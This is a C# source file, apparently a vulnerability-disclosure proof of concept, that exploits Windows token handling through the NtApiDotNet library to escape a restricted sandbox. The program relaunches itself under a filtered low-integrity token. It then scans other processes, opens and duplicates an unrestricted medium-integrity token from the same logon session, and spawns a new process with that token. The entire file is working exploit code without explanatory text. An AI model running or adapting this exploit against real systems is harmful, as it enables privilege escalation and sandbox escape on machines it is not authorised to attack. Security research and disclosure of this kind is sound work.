﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Linq;

namespace PoC_TokenParentId_EoP
{
    class Program
    {
        static bool IsRestricted()
        {
            return NtToken.PseudoPrimaryToken.Restricted;
        }

        static NtToken GetToken()
        {
            using (var token = NtToken.OpenProcessToken())
            {
                var ret = token.Filter(FilterTokenFlags.DisableMaxPrivileges, null,
                    (Luid[])null, token.Groups.Select(g => g.Sid).Concat(new Sid[] { token.User.Sid }));
                ret.SetIntegrityLevel(TokenIntegrityLevel.Low);
                return ret;
            }
        }

        static void RunExploit(int num)
        {
            int current_pid = NtProcess.Current.ProcessId;
            var auth_id = NtToken.PseudoPrimaryToken.AuthenticationId;
            using (var procs = NtProcess.GetProcesses(ProcessAccessRights.QueryLimitedInformation).ToDisposableList())
            {
                foreach (var p in procs)
                {
                    if (p.ProcessId != current_pid)
                    {
                        using (var result = NtToken.OpenProcessToken(p, TokenAccessRights.MaximumAllowed, AttributeFlags.None, false))
                        {
                            if (!result.IsSuccess)
                            {
                                continue;
                            }

                            var token = result.Result;
                            if (token.IntegrityLevel == TokenIntegrityLevel.Medium 
                                && token.AuthenticationId.Equals(auth_id) &&
                                !token.Restricted && 
                                token.IsAccessGranted(TokenAccessRights.Duplicate))
                            {
                                using (var dup_token = token.DuplicateToken(TokenType.Primary, 
                                    SecurityImpersonationLevel.Anonymous, TokenAccessRights.Duplicate))
                                {
                                    TokenAccessRights access = dup_token.NtType.MapGenericRights(TokenAccessRights.GenericAll).ToSpecificAccess<TokenAccessRights>();
                                    using (var x = dup_token.Duplicate(access))
                                    {
                                        x.IntegrityLevel = TokenIntegrityLevel.Low;
                                        StartProcess(x, num);
                                        break;
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }

        static void StartProcess(NtToken token, int num)
        {
            Win32ProcessConfig config = new Win32ProcessConfig
            {
                CommandLine = $"poc {num+1}",
                ApplicationName = typeof(Program).Assembly.Location,
                Token = token,
                NoTokenFallback = true,
                ChildProcessMitigations = ChildProcessMitigationFlags.Restricted,
            };
            using (var p = Win32Process.CreateProcess(config))
            {
                p.Process.Wait();
                if (p.ExitNtStatus != NtStatus.STATUS_SUCCESS)
                {
                    Console.WriteLine("Exit Status: {0}", p.ExitNtStatus);
                }
            }
        }

        static int GetProcessNum(string[] args)
        {
            if (args.Length < 1)
                return 0;
            return int.Parse(args[0]);
        }

        static void Main(string[] args)
        {
            try
            {
                int num = GetProcessNum(args);
                Console.WriteLine("In Process {0} - {1} - Parent:{2} Restricted:{3} IL:{4} Child:{5}",
                    num, NtProcess.Current.ProcessId, NtProcess.Current.ParentProcessId, IsRestricted(), 
                    NtToken.PseudoPrimaryToken.IntegrityLevel, NtToken.PseudoPrimaryToken.NoChildProcess);

                if (!IsRestricted())
                {
                    if (args.Length == 0)
                    {
                        using (var token = GetToken())
                        {
                            StartProcess(token, num);
                        }
                    }
                    else
                    {
                        Console.WriteLine("Success");
                    }
                }
                else
                {
                    RunExploit(num);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
                Console.ReadLine();
            }
        }
    }
}
